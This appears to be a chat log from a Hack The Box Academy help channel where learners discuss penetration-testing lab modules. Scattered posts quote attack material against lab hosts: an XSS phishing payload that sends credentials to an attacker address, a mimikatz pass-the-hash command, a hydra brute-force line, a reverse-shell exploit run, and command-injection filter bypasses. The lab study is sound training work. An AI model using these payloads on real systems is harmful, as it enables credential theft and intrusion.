https://academy.hackthebox.com/module/103/section/984
is ```document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();```
getting hella different outputs when executing 1:1 same code
Right but why is that?
cause the file doesnt exist
I stepped away from my pc but I ran logrotate -v to ensure it was installed. It gave me a version that was susceptible to the exploit.
Which would imply the file should exist
http://10.129.81.95/phishing/send.php?url=document.write(%27%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://94.237.60.187:75%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E%27);document.getElementById(%27urlform%27).remove();
rip @rustic sage
Can anyone help with logging into the smb share in service scanning. I tried using bob:Welcome1 with a capital B as well. I think its to do with the workgroup but I cannot enumerate this as the smb os discovery nmap script returns nothing.
Echo "cause the file doesn't exist"
if bob is a member of the domain you need to specify the domain. If its not part of the domain then presuming youre using crackmapexec you need to specify --local-auth
Nevermind I tried attempting this section in 25 mins so I'll just try it again. Maybe I missed something.
I was trying smbclient as that is what the guide used. Still can't login with crackmapexec. Do you have any other ideas?
People i have a question: I just completed the module Shells & Payloads. For the Host 3 on the Capstone exercise i had access denied to the administrator folder so i had to privesc. This is the intended path??? All this pivoting and Windows priv esc??
The website for the Responder module is down and I can't move on to tier two in starting point
this isnt for starting point discussion
verify your account in #welcome to gain access to a more relevant channel
thx
@thorn urchin can you help me with a question
not without knowing the question
@thorn urchin i want to know does windows update ask for pin and userid to restart for a update
like after restart or before restart
@thorn urchin before
not that I ever recall no
@thorn urchin but i was asked to give my pin and userid to restart my windows and i gave it to restart for update
what to do in welcome?
It can be implemented as a security feature. Or depending on the required update its benign. Sometimes windows is stupid
@fathom pendant can it be a malware too?
Read and comprehend what it's telling you
i was dumb enough to restart it
Login to your HTB Account
i don't have htb account
@fathom pendant will it unlock general chat?
It unlocks the rest of the server.
They say in the skills assessment that there's more than one way to do it, and that is one way
There is also a way to do it without privilege escalation, and you can DM about that if you want to
Also, I don't recall any pivoting needed unless you're trying to proxy your own VM through the foothold/parrot host that they give you
Hello guys, have you ever had this error with kerberos, using gettgtpkinit.py : "Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)" ?
yup thats a pretty notorious issue
Theres not good fixes cause its not really well understood what causes it.
Sometimes can just be timing issues and you need to resync to the DC but other times your SoL without knowing some inane workarounds that only situationally work
98% of the time if you see it on HTB its cause somethings broken :/
Hey guys i'm having trouble installing PSWindow update i'm getting this weird error can anyone help?
Okkk thanks for the reply, I was debugging to find why it wouldn't authenticate me !
Alh4zr3d got that error while doing the insane box Horus and got so frustrated that he was doing everything correctly but the box was just broken that he went out to become an ADCS expert and started making an ADCS hacking course just to prove he knew what he was doing on the box.
Thats how much of a malder that error can be
goat behavior honestly
Sometimes I get second hand embarrassment when he gets too frustrated doing a machine on stream, but dudes overall pretty cool and a big inspiration
damn now i see why vhosts are needed, but why do people use the FQDN (inlanefreight.local for example)
but doing an insane box live on stream when viewers expect him to get it all correct within 3 hours and have the benefit of walkthroughs while he doesnt use em AND the more complicated the box the more likely it breaks when being retired? yeah I get why he gets mad
someone know why proxy doesn't get installed?
```
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
```
I used those commands to install ligolo-ng, the agent got installed but the proxy not
What do you mean by installed?
I have killed the VPN process in my machine but the module doesn't turn off
When I try to start another machine, it asks me for turn off the first machine, but It doesn't turn off
Anyone knows what to do?
I just cloned the directory on my local machine with go 1.19.8 and managed to build the proxy with the given command
clear cache, restart browser
but it doesn't let me build the proxy files
looks like your go version is out of date
Same thing
their go version is more recent than mine, so I'm not sure if something is borked with their go installation or what
did that and terminated the previous machine?
I am not even connected to the VPN and the machine is already ON
it is 1.20.5
In the github it says I need 1.17+
the error has nothing to do with your vpn connection
maybe your go is TOO new
Why? As far as I know I need to be connected to the VPN to be able to connect to the machine and resolve it
By VPN I mean Starting Point
full-upgrade updates everything even if its dependency breaking
its a great way to break your vm
Checking the issues on a github repository is a good troubleshooting step to see if people have had similar issues
yes but that error is about a machine instance running which is independent of your vpn connection
Oh, alright
I can have a box running without being on the vpn and I can be on the vpn without a box running
Sounds reasonable
also this channel isnt for starting point, read #welcome to verify your account and access more appropriate channels
ty
am installing other go version
Who has done the Kerberos Attacks I can't seem to get past any of the delegation past unconstrained delegation computers.
trying to follow along just lead to failure I feel stupid
am gonna try now
the hacking cycle continues
ty for the help it worked
wait that didn't work. I give up
the cycle continues
I don't understand delegation
me either, its on my to do list
Is there going to be any point when Sapphire tickets and Diamond Tickets will be added to kerberos attacks?
Is there really no point with Silver and Golden tickets being really all you need?
@thorn urchin sorry 1 question. After installing the agent and proxy, I can delete the other files right?
Took me practically all day to complete the easy and medium skills assessments at the end of the Foot-Printing module. Hopefully the hard one doesn't take up my whole day tomorrow.
yea true, then they shouldn't relay in other dependencies after setting them up
I liked the footprinting skill assessments
shouldnt but Ive seen some people run into such issues anyways
and the speed for scanning is the same than with proxychains?
that sounds like something that requires specialized accessibility knowledge, so unlikely
faster
Yeah they are kinda fun. If it took me 1 day to complete the first 2 challenges. Going at that speed will I be in good shape by the time I get to the CPTS exam @thorn urchin ?
I dunno, everyones speed and pace is different
¯\_(ツ)_/¯
you can use a plugin to help for that
Did you figure this out? I am getting the same error.
Not sure what to do at this point or what I could do since its something with the DC/environment
good thanks
last thing im missing:
https://academy.hackthebox.com/module/17/section/64
Submit the contents of the flag file in the directory with directory listing enabled.
i found:
http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/public/
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/
not working http://blog.inlanefreight.local/wp-content/plugins/site-editor/
would be cool if anyone could help, really wanna go to bed xd
I'm confused on how to use the PrintSpoofer from github. I'm in the Exploitation and Privilege Escalation section in Attacking Enterprise Networks. I have the app downloaded to my VM, but there's no .exe file inside the directory. Is there something I'm missing here? Never mind. I figured out that you need to get the .exe from a different repository on github.
I am hoping someone can help me for the Bleeding Edge Vulnerabilities in the AD Attacks module.
is there anyway to do the CBBH exam for less than 220€?
with VAT
you know what i mean haha
There are a few ways to do that one afaik, one thing that helps is to straight up ask yourself or write down what you've done, and then step back and ask what stone you haven't turned yet
The whole system is fair game, so don't restrict yourself to what the section tells you to do
Look at the man page for ip, you have resources to search for these things
ty
Just got the flag in the White Box Attacks: Remote Code Execution portion (after a lot of trial-and-error). Anyone who has done this get an actual remote shell, or just code execution to read the flag?
does anyone know what sekurlsa stands for?
Hello, i have a problem
local security authority
thanks, but where is "sekur"?
Can you help me with a problem?
I have recently started with htb but when starting a new machine I get a notice saying that before starting that machine I must turn off another but I do not have any more on.
Says: you must stop Your active machine before spawning another one
Thanks
Still stuck? You can dm me.
Also read #welcome it'll help you access more channels
nah i got it
thats crazy tho
i didnt try to do all that cause it didnt make sense for it to want us to do an entire chain as the first module in the module
like it makes no sense they expect a beginner to know to do all that imo
if you don't know content of the file, you may search for the file for the rest of your life, I used ||grep ||
did you try any different method?
Hi
Hi
Hey everyone, Im excited to be back to HTB Academy. When I was last working on the info gathering module I got stuck on zones section.
Hi all! Please help!! I am stuck at Living off the Land module, third question: "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.". Any ideas how this flag looks like?? dsquery command with ldap filters print out nothing. What am i doing wrong?
I'm completely new and I've been enjoying everything so far even tho it's frustrating at times
so server cant find inlanefrieght.htb i know im doing something wrong cause i had this issue when i first started. What is it? I added the target to the etc/hosts file.
hello, is it normal i find flags on a machine that i am not supposed to find?
maybe?
just happen on me today lol
If you are doing Academy courses they use the same things for different modules. So you will likely find that flags to later questions or other modules. I had that happen before. I was very confused
damn
is there anyway to go from a reverse shell in root to a rdp connection easily?
Password Attacks Lab - Easy
i cant find the flag
that sentence surpasses my knowledge sorry
np
I figured out what i was doing wrong...
im struggling with just the intro stuff right now lol
ah then i can help you if youd like
why do u need an rdp connection?
i think i just caught myself up. its been like a year since i was last subbed to academy
idk easier to find the flag if there are some programs on the machine which requires a gui?
isnt the flag the password for the root user
i feel this way alot on academy lol
im trying to submit that edit: wrong flag
not working
make sure u dont leave any spaces at the end
nope
u can dm me to check it if u like
i lied im stuck again
i cant remember how i got the FQDN for inlanefreight
I already have the answer. i just cant remember how i got there
@latent sigil you still around?
I already have the answer for the getting the FQDN of the nameserver but i cant remember how I got there. I answered it ages ago
What module
info gathering web edition
my nslookup flags that it cant find inlanefreight.htb: NXDOMAIN
Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
I used dig
honestly the whole module doesnt mention FQDN at all i dont think so.
dig actually gives me output but i dont see the fqdn
Oh ok
I found your question
Nameservers are different from the normal domain
So the question is asking you to submit the subdomain+ domain of the nameserver
That's what fqdn
Fully qualified domain name if I remember correctly
ok so i need to remember how to find the nameserver
A simple dig all should do the trick
im starting to think im so rusty i need to just start from the beginning again lol
I mean you can reread the modules quickly
Or the cheat sheets
But imo I don't like dns
Even though it might seem as easy for some people
so dig will give the nameserver?
Took me a while to understand
Hint: the name server is there when you do a normal dig of the main domain name
Dm me where you're at
ok standby
I have a question regarding pass the hash challenge question 4. ||To get the flag I authenticate as the admin and then perform the pass the hash attack with davids hash, this opens a new command prompt where I can then use the type command to retrieve the flag. ||However if I just authenticate as ||david ||via rdp I get access denied & the same as if I just try to type the flag out as the ||admin||? Why is this, if I am using ||davids|| hash does this not imply he already has access rights? And as ||an admin|| would I not have rights across the board? Struggling to wrap my head around why we have to chain these attacks to get the credentials for an access rights perspective.
Linux priv. escalation -> Linux Services & Internals Enumeration -> What is the latest Python version that is installed on the target?
Python 3.8.10 whenever i get the version from the remote system
but the answer is not accepted.
Found the answer in the binary files instead of in version via other ways
you could have used also whereis
I also ever got stuck on this question, but someone point out to me that it ask for the 'latest installed version', not 'the one you used'
Doing Documentation & Reporting Practice Lab - been stuck for 3-5 hours
trying to achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.
I have collected users, passwords and cracked hashes, such as svc_vmwaresso, solarwindsmonitor, svc_vmwaresso, and ADMIN (ipmi_hash), etc..
and found other users such as librarian, and tried password spraying, and didn't get anything.
Using {PsExec + proxychains} for DEV01 and FILE01, and investigated the system and found nothing really useful
please help me if you can, thanks!!
Thanks for the extra way! Noted
linux priv. escalation ->path abuse -> Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?
Anyone a hint? tried several options but none were accepted as good answer.
or hint about the way it should be noted, since this is mostly the problem
SOLVED!!
what ._.
https://www.reddit.com/r/hackthebox/comments/u8u4w7/pwnbox_not_working_shows_desktop_then_turns_grey/
anyone knows how to fix this problem?
Look at the path variable
I've got the same problem with the in-browser, no trouble when i use the full screen / normal browser version. All the cosy things make the pwnbox blackout, auto resize to in-browser (while full screen). Only the normal way works for me
Yes, by reaching out to support
sure
||have you tried responder?||
and it should work
but the request went through, am i right ?
yes but I got blank page
what I mean is I forwarded it
then it's blank
changing the content type was the issue that you were having, and i think it has been solved
?
but what the next step should look like, that i am not aware of
I'm supposed to get a webshell obviously I said it's from the webshells module
The response should tell you where the webshell was uploaded to
what response?
When you forwarded your request?
the page isn't responding it's just white
Then your webshell isn't correct
Or you're not doing something right
If using php are you doing ?cmd=
I downloaded the right webshell I didn't alter anything except the forwarding request
still nothing. Anyone else more than the hint from MarcieLee?
Or ?{var in your php shell}=
in general you should execute your experimental payloads in repeater, did you do that ?
What are default directories
no the module says intercept
i gave the answer that came up with pwd but the answer wasnt correct
Pwd isn't the PATH.
Google environment variables
Are you accessing via burp and is intercept still on
even when it was off it still blank
HTB never tells you to follow a specific way or use a specific tool, it only showcases a certain method or a certain way, and it's up to you to use it or not
of course it's always easier to use the presented way or explanation, and most likely it will work but sometimes you could try whatever, there's no *HTB-Police*
let me try the repeater tool then
It's going to be blank unless you specify a command, change your code to execute the command "whoami" to see if it's even working
is it somewhere in here? because tried and didnt succeed. /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/tmp
OK. So you know a colon separates each individual directory path. If you want to just Google default PATH variable
Is that the path of the user?
yes
OK so you can just trial and error it
I will, although i still dont understand exactly what i am looking for but thats just a matter of not understanding the language properly enough. Thanks for nor
I haven't done this one so I dont know it off the top of my head
The question is asking for the full path of a directory that is in the user's PATH variable
Basically the /not/default/path no colons
ah thanks
I'd suggest linux fundamentals tbh
You could compare this path to the one on pwnbox or your own Kali. Many will be the same, likely only one different
If that tripped you up then you should definitely look into learning the basics
Was more that I did not understand what to give in. Solved now. Thanks for the help.
And that comes with not understanding how the PATH variable is formatted
Learned the lesson after all with your help
Hey guys could anyone help me on the windows priv esc module I'm on the initial enumeration section last question "what type of session does this user have" am I missing something here I can't work it out
Hello fellas, I'm having some troubles with a module question: The module is INTRODUCTION TO BASH SCRIPTING. and is the following question: Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer. (https://academy.hackthebox.com/module/21/section/129) I have a script that's printing in screen the iteration number and the whole "var" string in screen when it has a match with the variable "value", however, when I write those last 20 characters the exercise tells me that I'm wrong.
Try 19
Lol it worked
Thank you Marcie, I'm curious, why 19 and not the 20 from the original question?
Iirc it was an issue raised in #858470491676737536
Its because programmatically the index of a variable or array starts at 0
Yes but the question is stating last 20
When doing the last 20 the answer isn't accepted; last 19 is though. Its not a matter of computer counting
just want to ask
is the penetration tester path fully covered in the crest cpsa path
simply go through the module list and check yourself
indeed
it basically does if anyone wanted to know
In the Shells and payloads module live engagement section I RDP into parrot machine in order to begin testing the targets but the parrot machine doesn't have a browser and I can see in the nmap result a web server for target 1, what do I do?
just type "firefox" from the cli
found a python script that probably is an exploit that can be run from CLI so I may not even need the browser but it's throwing errors
```
INFO: Reverse shell will connect to: 172.16.1.5:4444.
Traceback (most recent call last):
  File "/home/htb-student/./tomcatWarDeployer.py", line 1224, in <module>
    main()
  File "/home/htb-student/./tomcatWarDeployer.py", line 1076, in main
    browser, url = browseToManager(
  File "/home/htb-student/./tomcatWarDeployer.py", line 863, in browseToManager
    m = re.search('Apache Tomcat/([^<]+)', data)
  File "/usr/lib/python3.9/re.py", line 201, in search
    return _compile(pattern, flags).search(string)
TypeError: cannot use a string pattern on a bytes-like object
```
before executing the exploit I would give a read to the code, since it can be that you need to be authenticated in order to make it work
it regures user and pass in the use syntax which I provided already
*requires
The IP 172.16.1.5 is on the machine you have RDP into
I thought I'd like start a listener
its a connection back
@warm drift to use a web-browser which will make things easier just type "firefox" from the cli and go from there
Yes, when you're trying to get the last 20 characters of the var there is an invisible \n newline character. It's considered a character, but you just can't see it.
yeah I was making my way through with the browser I almost got there but my VM crashed thanks for the help though
no problem
I'm on the Intro to Assembly Language (module/85section/893) and trying to solve this question: "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?" I have stopped the loop but I don't think I understood what hex value it is trying to ask of me. Need some clarification and guidance on the matter
https://academy.hackthebox.com/module/57/section/491
hydra -l b.gates -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f ssh://IP:PORT -t 4
already tried with rockyou-10.txt but no pw was found. can anyone give me a hint for the wordlist
check previous section where they teach you how to make your own wordlist
are we supposed to social engineer him (wife, dog, etc
or fine with first, last and username
mess around and find out ... i mean that in a non threatening way
just saw i don't even need to do it myself
can anyone help me with this
refresh your connection then cause that makes no sense
hi guys im on this question 1 from the predictable reset module in broken authentication
im not after an answer just someone to point me in right direction. im using the python script provided against the target website. i did use it against my target script on the local host first and it worked. i tried that token in the htbadmin slot and it didn't work. am i on right track or am i wasting my time
Hello fellas, I'm having some troubles with one exercise from INTRODUCTION TO WINDOWS COMMAND LINE: User and Group Management. The question is the following... "Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?" But the current account credentials (mtanaka:HTB_@cademy_stdnt!) don't work with the SSH service I have to use to connect into the machine of that exercise.
I tried the HTB-Student credentials for that machine and it seems to work, but unfortunately the user restrictions don't allow me to use the powershell cmdlet to complete the exercise, so I was wondering if I have to use the username of mtanaka.
Nevermind people, I had to use MTanaka (Caps were the fail reason)
Can anyone shed any light on the theory around this?
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
That indeed is the question
I can't find user F'**** password
That looks like a different module and/or section
I already tried with hydra
What module and section are you doing
I'm on Attacking Common Services - Easy
Are you sure the username needs to be in all caps. Also, have you tried all open services?
the user is fio**, and i found it with enumeration smtp
I tried to bruteforce the password, on hydra by (ftp/smtp/mysql)
It's a skill assessment for a reason
Just go through each thing from the module individually
Refresh the page and try again
¯\_(ツ)_/¯
Sometimes that happens
Hey guys could anyone help me on the windows priv esc module I'm on the initial enumeration section last question "what type of session does this user have" am I missing something here I can't work it out
can you show us what you've tried?
Hello, I am stuck at the same point. Can you help me and explain how you resolved this and connected with Z: ?
Try resetting the target first
I have run the set command and tried the session name but that's not working and basically ran all relevant commands in the module, just can't seem to see it
I'll have to leave for an hour or so, but the answer is in one of the modules examples, maybe ctrl F for session
If you don't get it then leave me a dm
I'll get back to you
Okay thank you I'll keep looking if not I'll message
Is there anyone in here to chat about machine connection issues? I am working in the AD Attacks and Enumeration module and it wants me to RDP to this host, but it keeps failing. I tried with both pwnbox and VPN, but no luck. RDP is open, but when I try to connect with the creds provided it does not work. Multiple resets do not work either :/
And the module will not offer a "request help" option, otherwise I would have tried that
guys can i ask something about password attacks section passwd opasswd and shadow
its going to be a spoiler in question so idk if i can ask it here
nevermind got it
Tried to dm you didn't send, just went through it again not sure what I'm missing
Are u using pass the hash technique to login using rdp?
Correct!! i connected with mimikatz # sekurlsa::pth /user:vfrank /domain:INLANEFREIGHT /ntlm:2e16a00be74fa0bf862b4256d0347e83 /run:"mstsc.exe /restrictedadmin"
I haven't completed that module yet, if I'd have to take a guess for the reason of the error, I'd say that I noticed there is a discrepancy between the ip address in your 2nd image and the ip address provided to you in the 1st image as a target, maybe you are trying to connect to the wrong address? But I have a question for you, how did you get the "Academy User" role?
hello any professional hacker here?
What does that even mean?
Well, I mean, is there any hacker here?
you are a hacker?
Go to an IRC, this is not the right place for that
If you cant follow simple instructions then youre not gunna find much success
add --local-auth or -d . to the crackmapexec command
The very first line of the crackmapexec output can be a good clue
you can usually see it from the output from crackmapexec
(domain:) being empty means it's not domain joined
that's because you added --local-auth it takes the hostname itself to the domain attribute of cme to authenticate locally
https://academy.hackthebox.com/achievement/886032/57 great module !
no fr
really really cool, very well done to whoever did it
@undefinedname
can anyone help me here
Hey guys, I'm having troubles with the stack based buffer overflow module. It asks for the size of the stack space after overwriting the EIP register.
Info proc all gives me a size that matches the format (0x00000 is the format) but it gives me incorrect answer. Any hints? Thx in advance
a
did you try downloading with the user credentials you found
yup, terminal special chars can be annoying
Id also delete the image cause of spoilers
You could also use single quotes which should also fix that
I was always using the hashcat identifier online and I just discovered this by mistake, if someone didn't know either like me
anyone available for a nudge on "session security" final skills assessment ?
```
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
```
how can i filter this bypassed character %7c aka |
it's not working urlencoded for me
WORKS ip=127.0.0.1%0afi$@nd%09${PATH:0:1}us$@r${PATH:0:1}sh$@ar$@e${PATH:0:1}%09
DOESN'T WORK ip=127.0.0.1%0afi$@nd%09${PATH:0:1}us$@r${PATH:0:1}sh$@ar$@e${PATH:0:1}%09%7c
which module